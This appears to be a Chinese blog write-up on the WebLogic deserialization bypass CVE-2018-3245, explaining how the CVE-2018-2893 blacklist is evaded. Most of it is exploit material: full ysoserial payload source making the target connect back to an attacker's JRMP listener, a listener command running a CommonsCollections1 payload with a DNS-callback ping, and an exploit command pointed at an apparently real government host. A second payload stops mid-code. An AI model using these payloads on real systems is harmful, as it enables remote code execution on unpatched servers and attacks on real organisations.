weblogic反序列化漏洞 cve-2018-3245（weblogic反序列化漏洞cve-2018_2628修复）

weblogic反序列化漏洞 cve-2018-3245（weblogic反序列化漏洞cve-2018_2628修复）

weblogic反序列化漏洞 CVE-2018-3245

0x00 针对cve-2018-2893的修复

针对JRMP反序列化修复的方式依旧是增加黑名单:黑名单package:java.rmi.activation sun.rmi.server黑名单class：java.rmi.server.UnicastRemoteObject java.rmi.server.RemoteObjectInvocationHandler

0x01绕过方法

因为将java.rmi.server.RemoteObjectInvocationHandler添加到了黑名单中，所以只要满足继承java.rmi.server.RemoteObject,且不在黑名单之中的类对象，比如：ReferenceWrapper_Stubjavax.management.remote.rmi.RMIConnectionImpl_Stubcom.sun.jndi.rmi.registry.ReferenceWrapper_Stubjavax.management.remote.rmi.RMIServerImpl_Stubsun.rmi.registry.RegistryImpl_Stubsun.rmi.transport.DGCImpl_Stub

0x02漏洞复现

使用ReferenceWrapper_Stub代码RemoteObjectInvocationHandlerpayload 一：

package ysoserial.payloads; import java.rmi.server.ObjID; import java.util.Random; import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; import sun.rmi.server.UnicastRef; import sun.rmi.transport.LiveRef; import sun.rmi.transport.tcp.TCPEndpoint; import ysoserial.payloads.annotation.Authors; import ysoserial.payloads.annotation.PayloadTest; import ysoserial.payloads.util.PayloadRunner; /** * * * UnicastRef.newCall(RemoteObject, Operation[], int, long) * DGCImpl_Stub.dirty(ObjID[], long, Lease) * DGCClient$EndpointEntry.makeDirtyCall(Set, long) * DGCClient$EndpointEntry.registerRefs(List) * DGCClient.registerRefs(Endpoint, List) * LiveRef.read(ObjectInput, boolean) * UnicastRef.readExternal(ObjectInput) * * Thread.start() * DGCClient$EndpointEntry.(Endpoint) * DGCClient$EndpointEntry.lookup(Endpoint) * DGCClient.registerRefs(Endpoint, List) * LiveRef.read(ObjectInput, boolean) * UnicastRef.readExternal(ObjectInput) * * Requires: * - JavaSE * * Argument: * - host:port to connect to, host only chooses random port (DOS if repeated many times) * * Yields: * * an established JRMP connection to the endpoint (if reachable) * * a connected RMI Registry proxy * * one system thread per endpoint (DOS) * * @author mbechler */ @SuppressWarnings ( { "restriction" } ) @PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest") @Authors({ Authors.MBECHLER }) public class JRMPClient3 extends PayloadRunner implements ObjectPayload { public ReferenceWrapper_Stub getObject ( final String command ) throws Exception { String host; int port; int sep = command.indexOf(':'); if ( sep < 0 ) { port = new Random().nextInt(65535); host = command; } else { host = command.substring(0, sep); port = Integer.valueOf(command.substring(sep + 1)); } ObjID id = new ObjID(new Random().nextInt()); // RMI registry TCPEndpoint te = new TCPEndpoint(host, port); UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); ReferenceWrapper_Stub stu = new ReferenceWrapper_Stub(ref); return stu; } public static void main ( final String[] args ) throws Exception { Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader()); PayloadRunner.run(JRMPClient3.class, args); } }

执行过程：ava -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 1 aaaaaaawhoai.t00ls.766cba58c1dd.tu4.org'

python exploit.py wsbs.gxds.gov.cn 7001 ysoserial.jar 47.94.2xx.xxx 1099 JRMPClient3

payload 二：使用RMIConnectionImpl_Stub代替：RemoteObjectInvocationHandler

package ysoserial.payloads; import java.rmi.server.ObjID; import java.util.Random; import sun.rmi.server.UnicastRef; import sun.rmi.transport.LiveRef; import sun.rmi.transport.tcp.TCPEndpoint; import ysoserial.payloads.util.PayloadRunner; import javax.management.remote.rmi.RMIConnectionImpl_Stub; @SuppressWarnings ( { "restriction" } ) public class JRMPClient5 extends PayloadRunner implements ObjectPayload